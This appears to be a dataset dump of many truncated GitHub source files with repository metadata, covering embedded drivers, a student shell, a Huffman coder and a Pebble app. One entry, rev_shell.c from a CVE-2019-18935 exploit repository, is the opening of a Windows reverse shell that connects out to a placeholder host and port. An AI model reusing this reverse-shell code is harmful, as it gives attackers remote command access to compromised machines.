4. Whenever a client requests for a connection, the request is stored in a queue
5. The server deques the queue, and create a new socket and binds this socket with the reque... | [
"sourimd@clemson.edu"
] | sourimd@clemson.edu |
0cdaadf36df21a01a5c96e82dd57738c15653174 | 6a92e88a7adf71106060e4fbecd45da256e52529 | /bpf1/bpf1_exclude_ipv6.c | ab5d998a4a93f447d67f192433ec6badd9407c12 | [] | no_license | RyutaKremer/linux_bpf | 414d2150c66688e83b6c77fdfb8bffd2ea7456c3 | 8c71733a1f2198a5e8da6928a43e9e9f4ca32c82 | refs/heads/master | 2020-05-22T14:32:19.105984 | 2019-05-27T04:16:00 | 2019-05-27T04:16:00 | 186,385,290 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,262 | c | #include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/filter.h>
#include <netpacket/packet.h>
#include <net/if.h>
#include <errno.h>
int main(){
int soc;
struct ifreq ifr;
struct sockaddr... | [
"cmer@inl.ics.keio.ac.jp"
] | cmer@inl.ics.keio.ac.jp |
e3eb63f3177651555b460ff0370b391e49957fd2 | f6b8f7abcf0d44774d082d7d0505dc13af4779a9 | /shell.c | 7afe09d9bcc7d6243e911c960179c2cebfbb889b | [] | no_license | wesleycqy/VirtualGccShell | 559415dbecafc22b524da18a45c432b89bf337aa | d2d16f1020ae7317f693ea85a80e4c0cf08f355e | refs/heads/main | 2023-03-25T22:02:19.899909 | 2021-03-25T16:45:22 | 2021-03-25T16:45:22 | 351,508,446 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 8,359 | c | // Wesley Chong
// Chapter 8 Assignment 8.26 shell.c
// Dr David Owen
// gcc shell.c csapp.c -lpthread -o shell && ./shell
/*
* Get csapp.h and csapp.c from http://csapp.cs.smu.edu/3e/code.html
*
* $ gcc shell.c csapp.c -lpthread -o shell
*/
#include "csapp.h"
#include <stdio.h>
#include <stdlib.h>
#include <strin... | [
"noreply@github.com"
] | wesleycqy.noreply@github.com |
443800dd7f7a05fa0372d878a8acb5648a6ae855 | 388c7515551f2416224a5bd7a965017155bf3c0b | /STM32L1_Example_Code/Projects/STM32L152RE-Nucleo/Examples_LL/ADC/ADC_AnalogWatchdog/Inc/main.h | 1aef4809e9bcb5c1d3dba04c2bb4a5ca86a1d3d8 | [
"BSD-2-Clause"
] | permissive | jsargent2008/CubeSat-WTC | b8f181f1efb3325f9273d86e7bfb09a2f84f5c13 | 93b5308128506446efd0d211f2c86ffae46586a6 | refs/heads/master | 2021-04-27T09:14:14.364818 | 2018-05-11T03:26:00 | 2018-05-11T04:09:46 | 122,510,266 | 2 | 0 | null | 2018-06-07T22:22:32 | 2018-02-22T17:17:35 | C | UTF-8 | C | false | false | 4,745 | h | /**
******************************************************************************
* @file Examples_LL/ADC/ADC_AnalogWatchdog/Inc/main.h
* @author MCD Application Team
* @brief Header for main.c module
******************************************************************************
* @attention
... | [
"tccox3@knights.ucf.edu"
] | tccox3@knights.ucf.edu |
83adfcbd73fbd84f51d4231d05e15d7397832d80 | 0cfbaba7541a1cda9ceaf918553a91bc520d1b58 | /Arduino/C/adc.c | 0242a83f5b93249905a3fcfbf476ea912fba61a6 | [] | no_license | LuizFelipeLemon/ELE1717 | 85b1ea5048a330b30756f09e6d04d122448172f3 | cae4b86535062e031be375fea0f0241c9d0fc4a6 | refs/heads/master | 2020-04-22T23:07:59.702640 | 2019-06-16T00:23:21 | 2019-06-16T00:23:21 | 170,730,774 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,104 | c | #include <avr/io.h>
#include <util/delay.h> //_delay_ms(iDelay); // Call Delay function
#include <math.h>
int main(void){
float n;
unsigned int adcOut,cosseno;
DDRD = 0xFF; // Set PORTD as Output
DDRB = 0xFF;
// Set ADCSRA Register in ATMega168
ADCSRA = (1<<ADEN) | (1... | [
"luizfelipeplm@gmail.com"
] | luizfelipeplm@gmail.com |
d917949c032bad3b0c9610effcd539682d078baa | a373290f3eed2631834f7409a8cc6bfbea605556 | /src/app_data.h | be7fae177f078dbd07f49fab2369b1098b710a6a | [
"Apache-2.0"
] | permissive | grebnetiew/fullcircle | 7dce8d53bda36ddba59c20561182f0a6dc639830 | 3b649810703bc6fe60a216826bcbf755137e52ed | refs/heads/master | 2021-01-17T14:46:20.609782 | 2016-07-15T09:23:46 | 2016-07-15T09:23:46 | 47,679,447 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,292 | h | #pragma once
#include <pebble.h>
#include "palette.h"
/*
This struct aims to contain all info about the app content
(calendar, palette, etc) and offer ways to manipulate it.
In this way, it replaces the old and interlocked AppSync,
Storage and Palette structs/methods.
*/
#define CAL_CURRENT_VER 1
#define CAL_... | [
"eweitenberg@gmail.com"
] | eweitenberg@gmail.com |
5b5661d2ba3c06294eea8f361f02eb9aab760cf0 | 88c43aad2901f42a5b93eb9c30a43c739867f5a6 | /nphelloplugin/func.h | e8dc2903f406ae7a0c6fbefb5a6d8153072e0f5f | [] | no_license | yhyacinth/np-hello-plugin | e56c4a306704145ab2fd619471f9a3b23f854e72 | b97c7c812b5327bdc36a554c845cd828d15237b8 | refs/heads/master | 2016-09-09T20:25:31.680150 | 2013-07-08T08:59:02 | 2013-07-08T08:59:02 | 11,249,974 | 1 | 0 | null | null | null | null | UHC | C | false | false | 2,345 | h |
///// AFX Header Start
#ifndef _SECURE_ATL
#define _SECURE_ATL 1
#endif
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 거의 사용되지 않는 내용은 Windows 헤더에서 제외합니다.
#endif
#ifndef WINVER // 필요한 최소 플랫폼을 Windows Vista로 지정합니다.
#define WINVER 0x0600 // 다른 버전의 Windows에 맞도록 적합한 값으로 변경해 주십시... | [
"rhealove01@gmail.com"
] | rhealove01@gmail.com |
d8b62dca236cf04a4c2148870f1365430eee140b | 18b7fdab3179b61527a0d7dfd6e26476e9a71545 | /rev_shell.c | 8fffd66780f0a811a5bfe3040e5a17febb38e7fb | [
"Apache-2.0"
] | permissive | RandomRobbieBF/CVE-2019-18935 | 6e9fdf462b52c4520ead0bc6b105f36572c95b46 | 50a654fd7d13c95801a550f777bc8fab1149479f | refs/heads/master | 2020-10-02T03:36:29.233457 | 2019-12-12T09:39:02 | 2019-12-12T09:39:02 | 227,692,536 | 1 | 0 | Apache-2.0 | 2019-12-12T20:40:25 | 2019-12-12T20:40:25 | null | UTF-8 | C | false | false | 1,741 | c | #include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32")
#define HOST "<HOST>"
#define PORT <PORT>
WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
char aip_addr[16];
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
// Adapted from https://github.... | [
"c@leb.email"
] | c@leb.email |
bc01132e1db4a04fb1851a9a72c3aa5997cd7bf7 | cf2d08bc0f14c9e836cb534c852a5b3f0a16a8b5 | /NAS/ESM/MSG/ActivateDedicatedEpsBearerContextAccept.c | 7a8c15b3c3ad111e620af06bf0fb0a41ae6449a0 | [] | no_license | amoghpc/temp | c434019392440ef35b4e79944f07e09d4bb0f8d9 | 7be7ae05670fba280473633bd6fcf785234bc2d7 | refs/heads/master | 2021-05-04T10:56:20.091890 | 2017-04-12T03:21:33 | 2017-04-12T03:21:33 | 48,745,132 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 4,151 | c | /*
* Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The OpenAirInterface Software Alliance licenses this file to You under
* the Apache Licens... | [
"cs15mtech01005@iith.ac.in"
] | cs15mtech01005@iith.ac.in |
ba0b8ffe224633d12064c6f7ee19e44636ed0f18 | 61ee0675f88c5bc52f7ffe1ffd6ad1dd20b8fecc | /faultInject/source/huffman/patches/huffman.c._MLPA_148.patch.c | 4806ca94c87a7bc8f1c1e7a8ff825dfe59629d10 | [] | no_license | joelpinto/MEI-A2 | 1ef7969127be10f404dc21a1161c23897ed6450b | 4eb773b28396aa4b98cd3cea8492de9d758e8349 | refs/heads/master | 2021-01-12T08:25:21.644761 | 2017-01-31T19:49:36 | 2017-01-31T19:49:36 | 76,571,968 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 11,387 | c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "huffman.h"
#include "queue.h"
#include "heap.h"
#define HAS_CHILDREN(node) (node->left || node->right)
typedef struct _node{
int repeat;
unsigned char value;
struct _node *left, *right;
} Node;
static int CompareByRepeat(void* a, void* b)... | [
"joel.pinto.correia@gmail.com"
] | joel.pinto.correia@gmail.com |
35967d57d10cce9074bdcde1b33bb6358fc3e460 | ee017844be5100f040b2944ef1df0b4eed11a76f | /新步兵底盘测试/Src/gpio.c | bcbd731accf79e8418abc512ab210c64fd445147 | [] | no_license | LKunhaha/Other_test | eff7ae37b869a1505b928bd4759257a48184667e | 3808aa589b7a5b8af00da2dbfb38f849c6013f37 | refs/heads/master | 2020-09-07T04:27:51.819118 | 2019-12-03T05:09:34 | 2019-12-03T05:09:34 | 220,654,618 | 0 | 2 | null | 2019-12-03T05:09:35 | 2019-11-09T14:32:38 | C | GB18030 | C | false | false | 8,246 | c | /**
******************************************************************************
* File Name : gpio.c
* Description : This file provides code for the configuration
* of all used GPIO pins.
******************************************************************************
*... | [
"LKunhaha"
] | LKunhaha |
beb82b890d903419ca31ab9c0a50b55de59c4825 | e37572aa851402a2c40fc8d632f11b6bc3eb7306 | /openservo (reference)/AVR_OpenServo/old/eeprom.c | 45d57dfc777b337b695eba27057fcc84f5e369ee | [] | no_license | mokis/MServo | 2c463ead5286ff3f885849499b918c241572a3a8 | c389f628dff9bc6e2b7c12dc1f8b26774ec61c71 | refs/heads/master | 2021-01-10T06:06:31.186515 | 2015-06-06T20:33:53 | 2015-06-06T20:33:53 | 36,994,067 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 4,115 | c | /*
Copyright (c) 2006 Michael P. Thompson <mpthompson@gmail.com>
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights... | [
"petri.m.mantere@gmail.com"
] | petri.m.mantere@gmail.com |
b20ee6d2b1c4b816693f4b1fe62ac9d0cb2f37d0 | fe6554dd65f3cd47e6e5aaedd1c5782fbda228ce | /ios/Pods/Headers/Public/Appboy-iOS-SDK/ABKInAppMessageModal.h | 4f3f8cd5285bac60d4cf7edde177ef25bbd00fb5 | [] | no_license | reactexcel/HRrecruitapp | b0fa1b1c0af884863f9947f13a127cf8ae711340 | 1b551795b6c13991056ac197583e36f036a8fb46 | refs/heads/master | 2023-01-05T14:22:55.197234 | 2018-09-18T09:32:35 | 2018-09-18T09:32:35 | 133,463,797 | 1 | 0 | null | 2023-01-04T04:28:35 | 2018-05-15T05:30:28 | JavaScript | UTF-8 | C | false | false | 81 | h | ../../../Appboy-iOS-SDK/AppboyKit/headers/AppboyKitLibrary/ABKInAppMessageModal.h | [
"rahul.excel2011@gmail.com"
] | rahul.excel2011@gmail.com |
a4330416fa456dbd7ec9e3b74c69c1dd57cd8b5a | 7dc2fb3b103d3638a2bbd6c461798a8dd82b9fa8 | /include/tools.c | 31e61c73bab7537f8547be84888c404574698ad9 | [] | no_license | programcj/zwave-controll-api | e036284b7ca7c51f1134e680985dcf9abf78a498 | 8c56451dc4f32d8990a019faaa851d71c93733d5 | refs/heads/master | 2021-01-13T03:33:06.417769 | 2018-03-16T06:25:50 | 2018-03-16T06:25:50 | 77,524,738 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 7,382 | c | /*
* util.c
*
* Created on: 2015年12月1日
* Author: cj
* Email:593184971@qq.com
*/
#include "tools.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include<sys/types.h>
#include<dirent.h>
#include "clog.h"
#include <unistd.h>
#include <uuid/uuid.h>
/**
* Hex 字符串转换成 到... | [
"chenjian@hank.com"
] | chenjian@hank.com |
4ce9000bee204166dc1d4c61601941d06db50b74 | bda04d2b8b3ec672a98af2b3fcab79b7f3a39189 | /ThingyApp/src/thingy_aggregator.c | 4b16d6b3f71c5cc84740ddc7cfc9aa157700ccad | [] | no_license | epicsNSLS2-sensors/ThingyAggregatorIOC | 8a213076de97837b6b222d0bc56325c45a44750b | 39a5c1e3225aeac29ab4235b07183c680b184029 | refs/heads/master | 2020-06-23T17:56:48.236957 | 2020-01-17T17:50:15 | 2020-01-17T17:50:15 | 198,707,162 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 12,414 | c |
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <time.h>
#include <ctype.h>
#include <math.h>
#include <pthread.h>
#include <signal.h>
#include <dbAccess.h>
#include <dbDefs.h>
#include <dbFldTypes.h>
#include <dbScan.h>
#include <registryFunction.h>
#include <aSubRecord.h>
#i... | [
"rollandmichael7@gmail.com"
] | rollandmichael7@gmail.com |
f20dc0ae0c9678f5f1ddf4fa380c3e8205c3999f | b3d9c43e6665895284ecbbc8c7870c8077f6d584 | /ข้อprime friend.c | b33ed63d3b8a45aa284cd0c66071d9091fe3cb3b | [] | no_license | b6320503106/128_lap3 | 7d758b734478572707debeb1f33eaf503cc424f9 | 1c62a86cf974fa1d084003e63914321caabe182d | refs/heads/main | 2023-03-03T08:26:43.463590 | 2021-02-15T13:11:20 | 2021-02-15T13:11:20 | 339,029,884 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 241 | c | #include<stdio.h>
int main()
{
long int n;
int i=3,max;
scanf("%ld",&n);
for(i=1;i<n;i++)
{
if(n%2==1)
max=n;
else if(n%i==1)
max=i;
}
printf("%d",max);
return 0;
}
| [
"noreply@github.com"
] | b6320503106.noreply@github.com |
0313f4a2f8939f07b25767780bad845e76b651fb | 1662a6c7f49589f9d6490021c3bccd7f4d8c3ca2 | /conditional_statements/display-digits-ab.c | 1a64308087c24c1584a5103739aa862dad8c12df | [] | no_license | devmanojsoni/cpp | 0aff0ddd6f1ac77bed93755e6b01b06c98d078f9 | 2f605940e9cd12881777035cdaff6a03bdef7a64 | refs/heads/master | 2020-07-30T04:04:58.507188 | 2019-10-03T16:11:28 | 2019-10-03T16:11:28 | 210,080,255 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 408 | c | #include <stdio.h>
#include <stdlib.h>
#include <math.h>
/* Created by Manoj Soni on Friday, September 20, 2019 */
/* Description: Display Digits by Abdul Bari */
int main() {
/*Code here*/
void digits(int);
digits(1234);
//getch();
return 0;
}
void digits(int n)
{
int digit;
whi... | [
"er.manojsoni@hotmail.com"
] | er.manojsoni@hotmail.com |
eaf240b8693d327c6d2e910b3e6f0e03e7fb8d67 | 2d59fb0c5b5a7dbc1c31fab2ea3b89a08a859ef6 | /include/altera.h | 22d55cfd73e70dd17a979d1dc8d508053bd4f29e | [
"0BSD",
"GPL-2.0-or-later"
] | permissive | CPU-Code/-u_boot_fslc | 683f4d183723df62f17645ec7f2d3c6bccbf737c | da15f58fe22fce65c6934eaa0d69d8bd2631f9a7 | refs/heads/master | 2023-04-03T15:38:33.105773 | 2020-05-16T12:04:44 | 2020-05-16T12:04:44 | 278,999,208 | 0 | 0 | 0BSD | 2021-04-20T20:20:33 | 2020-07-12T05:38:02 | C | UTF-8 | C | false | false | 3,625 | h | /* SPDX-License-Identifier: GPL-2.0+ */
/*
* (C) Copyright 2002
* Rich Ireland, Enterasys Networks, rireland@enterasys.com.
*/
#include <fpga.h>
#ifndef _ALTERA_H_
#define _ALTERA_H_
/*
* For the StratixV FPGA programming via SPI, the following
* information is coded in the 32bit cookie:
* Bit 31 ... Bit 0
* ... | [
"923992029@qq.com"
] | 923992029@qq.com |
d1a306b539628a88a9f0f5560d1fd3a4fbc0030f | ecce427678ecff2a93a47f3b1b664202c7d27617 | /levels/bob/chain_chomp_gate/collision.inc.c | 8261a0009ef6c01ef5182f0b4b276d6206075a05 | [] | no_license | sm64pc/sm64ex | ecf37f31b3f7426c4874254660d856030d789714 | 54cd27ccee45a2403b45f07a00d6043c51149969 | refs/heads/nightly | 2023-08-11T12:14:34.424168 | 2023-07-01T11:45:50 | 2023-07-01T11:45:50 | 262,091,731 | 795 | 238 | null | 2023-07-01T11:45:51 | 2020-05-07T15:43:27 | C | UTF-8 | C | false | false | 361 | c | // 0x070113C0 - 0x070113F0
const Collision bob_seg7_collision_chain_chomp_gate[] = {
COL_INIT(),
COL_VERTEX_INIT(0x4),
COL_VERTEX(512, 0, 0),
COL_VERTEX(512, 640, 0),
COL_VERTEX(-511, 640, 0),
COL_VERTEX(-511, 0, 0),
COL_TRI_INIT(SURFACE_DEFAULT, 2),
COL_TRI(0, 1, 2),
COL_TRI(3, 0, 2... | [
"n64"
] | n64 |
b614a9f55c15c70b12da4f449aafdfee048bf9ef | a3421ecebedf3ba47a5480776078132be98ee61c | /lib/lib/include/bank.h | 196411e1ad972e0af0347af4b149505857b730aa | [] | no_license | Muderru/NighmareMUD | 7851738d08b0d3d6a46fc7fe32cf25b3cdaffdb0 | c8f91447afaa4ff70460e300dd0a6c64e369bfd5 | refs/heads/master | 2020-03-27T13:45:03.384061 | 2018-08-29T15:57:52 | 2018-08-29T15:57:52 | 146,626,384 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 878 | h | #ifndef l_bank_h
#define l_bank_h
static void create();
mixed CanBank(object who, string currency);
string SetBank(string str);
string SetCurrency(string str);
int SetSurcharge(int amount);
int SetNonResidentSurcharge(int amount);
int SetMinimumTransaction(int amount);
float SetExchangePercentage(float f);
mixed ... | [
"overmind2017@yandex.ru"
] | overmind2017@yandex.ru |
1b083df70b2a4b16d6c1b31d8764291444cd2639 | 5c4c6db1ce2c08fd294489356ba42b8e538637a2 | /lib/krb5/config_file.c | 90dae5600c40964a78e4a15ab5afebe00781b6b9 | [
"BSD-3-Clause"
] | permissive | ystk/debian-heimdal | 7fd22ea9cc523f24c7b30923c5ac27a270bd37a2 | 446a6eaa0a15bcd8523e1567150d1b02a1c42e62 | refs/heads/master | 2023-02-20T09:27:02.393201 | 2010-07-26T05:19:37 | 2010-07-26T05:19:37 | 47,387,124 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 31,272 | c | /*
* Copyright (c) 1997 - 2004 Kungliga Tekniska Högskolan
* (Royal Institute of Technology, Stockholm, Sweden).
* All rights reserved.
*
* Portions Copyright (c) 2009 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided th... | [
"skerlet@swc.toshiba.co.jp"
] | skerlet@swc.toshiba.co.jp |
c26e6649fec66a95f9d840be60ed73c1eee05e61 | 6e26c6d420f74bb69504239c570a5559c652b9c7 | /src/memory.h | 764bc4a84d171bbe529acbe852328d11066b42da | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | sorakun/Eve_old | f15c5b53289726a68316009b67169549a3d69ae1 | c2704a204b28450636542db78b01820b54b502a2 | refs/heads/master | 2020-04-15T00:22:51.981078 | 2013-01-19T02:08:27 | 2013-01-19T02:08:27 | 6,045,227 | 3 | 0 | null | null | null | null | UTF-8 | C | false | false | 329 | h | /*
* Eve programming language
* Memory Manager header
* check eve.h for copyright informations
*/
#ifndef EVE_MEMORY_H
#define EVE_MEMORY_H
#include "eve.h"
void * eve_malloc (size_t size);
void * eve_calloc (size_t num, size_t size);
void * eve_realloc(void * p, size_t size);
... | [
"sorakun@legtux.org"
] | sorakun@legtux.org |
1589f5da47ae2740b02711a1803adcd86c83dca5 | a3cdb956300b59ecf86b71193b35397dd9ad925e | /Project1/TCPIP_Stack/DHCP.c | 64e11fbd5789152a286e20006570640434db80ae | [] | no_license | BartOutOfTheBox/SORTES1415 | 8d31e0f24593fe7be2c091521bfefacda8936ad4 | ab1da702a4ac6746f49417fc1a2fca6e40ced1cf | refs/heads/master | 2020-12-24T13:52:38.289743 | 2014-12-31T14:16:11 | 2014-12-31T14:16:11 | 26,860,224 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 36,291 | c | /*********************************************************************
*
* Dynamic Host Configuration Protocol (DHCP) Client
* Module for Microchip TCP/IP Stack
* -Provides automatic IP address, subnet mask, gateway address,
* DNS server address, and other configuration parameters on DHCP
* enabled networks.
* ... | [
"thecainer@thecainer.be"
] | thecainer@thecainer.be |
a5f07bf7ca58a6f21736893cb3f75d47344e1607 | 49780f24a92fcc9a7c855144fb195ae3736bf390 | /examples/devices/MSP430FR2xx_4xx/MSP430FR231x_Code_Examples/C/msp430fr231x_LPM3_01.c | c4968c44233bdd03c058d1d39f4c952912a93cca | [] | no_license | PiBoxY/msp430ware | 81fb264c86ff1f68f711965b793aa58794ae2f00 | 7c96db00f97bbfd3119843e18ac895a54b4a6d39 | refs/heads/master | 2020-04-21T07:29:13.386144 | 2019-02-06T11:32:42 | 2019-02-06T11:32:42 | 169,394,007 | 2 | 1 | null | null | null | null | UTF-8 | C | false | false | 4,411 | c | /* --COPYRIGHT--,BSD_EX
* Copyright (c) 2014, Texas Instruments Incorporated
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above c... | [
"admin@piboxy.com"
] | admin@piboxy.com |
75035dc6c58d442c03480e908558f4bfedaae679 | 7b2bc33a8575f3501fba05df86aed3844785949c | /hycom/MSCPROGS/src_others/FES2004/src/error.c | fe37902e52b7f26092a64c43dcfff7647bf497be | [] | no_license | liqun1981/NERSC-HYCOM-CICE | 9ef6f6411a2e9652b13af329c61f8861701c1b1a | c71e3d87473d5c3641fda37d8f9981cbfe77e728 | refs/heads/master | 2022-04-11T12:07:10.172643 | 2019-11-16T20:32:49 | 2019-11-16T22:01:27 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,241 | c | /*
* Management of errors.
*
* Developer : CLS - CNRS/LEGOS
* Version : 1.2
* Date : 13 January 2005
*
* 1.2: remove conditional compilation
*
*/
#include "fes-int.h"
/*
* This structure represents FES errors messages.
*/
struct _fesErr
{
int code;
char* reason;
};
static struct _... | [
"knut.lisaeter@nersc.no"
] | knut.lisaeter@nersc.no |
0ff1feb7763e38c7169ad4148ab7e7f3c3783650 | 0c5d3b088080577388f5766431487534f93a2c40 | /Github-Projects-Origin/linux-master/drivers/scsi/qedi/qedi_fw_api.c.bak.c | e4147510b11fb642df51c08350cfb8ff11806b01 | [] | no_license | zhiyuanjia/WoBench | 878255ce45e76ef57f88743c7f43acdfa59e93e7 | 6b337780cbd598de98fc0eabd19efaf1a01b6012 | refs/heads/master | 2021-09-23T03:12:08.091319 | 2018-06-14T10:17:59 | 2018-06-14T10:17:59 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 26,630 | c | #include <assert.h>
#include <string.h>
#define INCLUDEMAIN
/* QLogic iSCSI Offload Driver
* Copyright (c) 2016 Cavium Inc.
*
* This software is available under the terms of the GNU General Public License
* (GPL) Version 2, available from the file COPYING in the main directory of
* this source tree.
*/
#include ... | [
"wangcong15@mails.tsinghua.edu.cn"
] | wangcong15@mails.tsinghua.edu.cn |
46346e61e40d7d72db6f665e5b06413ef34d6f8b | a6323ffd74f6ec6c42c8e04213824a6f3b735f11 | /src/image.h | 437e5d4ed57a24054e367b82f4a4fc7ce8dfc3ff | [
"MIT"
] | permissive | isdampe/imgarc | 493739d42ae0c6690100eb01030489c60a7907f0 | 16a7a918e709861b48cac5d39361a3b80a4a94b1 | refs/heads/master | 2021-05-05T04:38:27.017310 | 2019-12-28T03:26:50 | 2019-12-28T03:26:50 | 115,896,795 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 881 | h | #pragma once
#include <stdint.h>
#include <png.h>
enum imgarc_img_errors
{
IMGARC_IMG_ERROR_READ_STRUCT,
IMGARC_IMG_ERROR_CREATE_INFO,
IMGARC_IMG_ERROR_SETJMP,
IMGARC_IMG_ERROR_FWRITE,
IMGARC_IMG_ERROR_WRITE_STRUCT
};
typedef struct
{
int8_t error;
png_structp png;
png_infop info;
png_byte color_type;
png_b... | [
"isdampe@gmail.com"
] | isdampe@gmail.com |
d63a37cf268874e9bb575d2ca54484c31e8f092c | 6cd662f7e0b877699ead06f92401fcc6dbf6a660 | /new/spms/src/bin/plog/from.c | 2ec6c18820a74f7df9c7469de4a8b75b16303063 | [] | no_license | Roare/Digital-Ultrix-32-VAX-2.0 | d53ff4b2c559a9e03cbc073de5c106b38591e43f | 56695b632d960b605717f93f84dc6fa7ec5b4e2f | refs/heads/master | 2023-09-01T17:43:13.032091 | 2020-04-25T00:27:39 | 2020-04-25T00:27:39 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 5,650 | c | /* $Header$ */
/*
* Author: Peter J. Nicklin
*/
#include <ctype.h>
#include <stdio.h>
#include "date.h"
#include "from.h"
#include "null.h"
#include "yesno.h"
#define INCRFROM 1000 /* amount to increase From ptr array */
#define MAXFROM 1000 /* initial size of From pointer array */
static FROM **Fromp; /* poi... | [
"zahir.meddour@protonmail.com"
] | zahir.meddour@protonmail.com |
50b938814ffa32c03583fb1d08ddcfc4dd2776e6 | 38a55c8aea3efb0fbdeb7b05bea6e6727a4dc9c7 | /AVX2_Optimized_Implementation/luov-7-110-374-keccak/AVX_Operations.h | 387b6b9b991a4c376883861fb6174fc6746522b9 | [] | no_license | WardBeullens/LUOV | f3b6866f751b566bf59e5cae544250ba4af4aaa5 | 2d49bddad9f52e341ee25bf92ef2cfaf54164e80 | refs/heads/master | 2022-08-31T18:10:46.970765 | 2022-08-26T08:03:33 | 2022-08-26T08:03:33 | 112,632,511 | 10 | 4 | null | null | null | null | UTF-8 | C | false | false | 48,070 | h | #ifndef AVX_STUFF_H
#define AVX_STUFF_H
#include "parameters.h"
#include "stdalign.h"
#include "immintrin.h"
#include "F256Field.h"
//used for timing stuff
static inline
uint64_t rdtsc(){
unsigned int lo,hi;
__asm__ __volatile__ ("rdtsc" : "=a" (lo), "=d" (hi));
return ((uint64_t)hi << 32) | lo;
}
#defin... | [
"ward@beullens.com"
] | ward@beullens.com |
070059b2a16052fd6866534ccffae5bfaa302693 | 9791a7a24160c3acacb1d0bb1b5b4453361b2151 | /WinDDK/7600.16385.1/inc/ddk/aux_klib.h | 593bfefecc24b6abdd3284bb9d1e8092b68c9d18 | [] | no_license | kcrazy/winekit | fedc7bfa3fa702423f93447a8a19e2a4d358241e | 7948f5f42a60225d9f94930be539f0a1d6202dbc | refs/heads/master | 2021-01-10T08:18:48.598427 | 2017-02-17T05:34:15 | 2017-02-17T05:34:15 | 50,400,541 | 2 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,922 | h | /*++
Copyright (c) 2004 Microsoft Corporation
Module Name:
aux_klib.h
Abstract:
Kernel mode shim to access system functionality that is not properly exposed
to applications in currently shipping operating systems.
--*/
#ifndef _AUX_KLIB_H
#define _AUX_KLIB_H
#ifndef PIMAGE_EXPORT_... | [
"thekcrazy@gmail.com"
] | thekcrazy@gmail.com |
76e53b8241bc06a2edceca897a3254a58b3da2d0 | 598737b786a20889dc6acd468478baf4972535b3 | /src/sys/dev/cardbus/if_fxp_cardbus.c | e6e043fe7cc6cf4de9b8531634ef1c70147c91a1 | [] | no_license | shisa/shisa-netbsd | 5c8e289de2a48b6d8f39bd3add9ca4ea48fec1da | 28d999d1c25107c126e0a458a97b9397aae592ef | refs/heads/master | 2021-01-01T05:33:32.619808 | 2008-05-26T04:27:54 | 2008-05-26T04:27:54 | 32,793,680 | 1 | 2 | null | null | null | null | UTF-8 | C | false | false | 8,352 | c | /* $NetBSD: if_fxp_cardbus.c,v 1.19 2005/02/04 02:10:36 perry Exp $ */
/*
* Copyright (c) 1999 The NetBSD Foundation, Inc.
* All rights reserved.
*
* This code is derived from software contributed to The NetBSD Foundation
* by Johan Danielsson.
*
* Redistribution and use in source and binary forms, with or with... | [
"keiichi@mobilegravity.sfc.wide.ad.jp"
] | keiichi@mobilegravity.sfc.wide.ad.jp |
e19da6f7341bda2aa90d6bc6ea78f31771f1919b | a0bfba131642cc418badd23b43339b9076119723 | /data_gather_project/client/driver.c | b48e492cb4a8648a7a8edbf76fecd838e15bc18d | [] | no_license | feiying/temperature-sensor-data-gather | 89f7287d7e64584305acc756d8030876678420a6 | 836c4279f1caf1494f492a69d314809b6d197304 | refs/heads/master | 2020-06-13T22:44:47.939476 | 2015-04-27T09:18:30 | 2015-04-27T09:18:30 | 34,657,132 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 2,772 | c | #include <linux/kernel.h>
#include <linux/module.h>
#include <asm/mach/map.h>
#include <asm/arch/map.h>
#include <asm/arch/regs-mem.h>
#include <asm/arch/regs-adc.h>
#include <asm/arch/regs-clock.h>
#include <asm/arch/regs-gpio.h>
#include <asm/io.h>
#include <linux/dma-mapping.h>
#include <asm/arch/regs-lcd.h>
#includ... | [
"dongyang.jin@cs2c.com.cn"
] | dongyang.jin@cs2c.com.cn |
32dedeb2be9e382bc794faaa050b82e6bc94ff90 | cc8b175a729b34bb58e1bd408ec192b78f945535 | /032_Timer/src/TransFloor.h | cf8cf0265a481bcd39a4a8c7b420a40726578642 | [] | no_license | leico/TransFloor_Aichi | c7916c2cbdecc4f5086cd7234124fbefae5ee72f | 925e25b4b2e526bacb01a110b6c748fb20ce494c | refs/heads/master | 2020-11-27T02:03:13.124999 | 2016-10-05T10:44:00 | 2016-10-05T10:44:00 | 66,533,555 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 647 | h | //
// TransFloor.h
// emptyExample
//
// Created by leico_system on 2016/09/09.
//
//
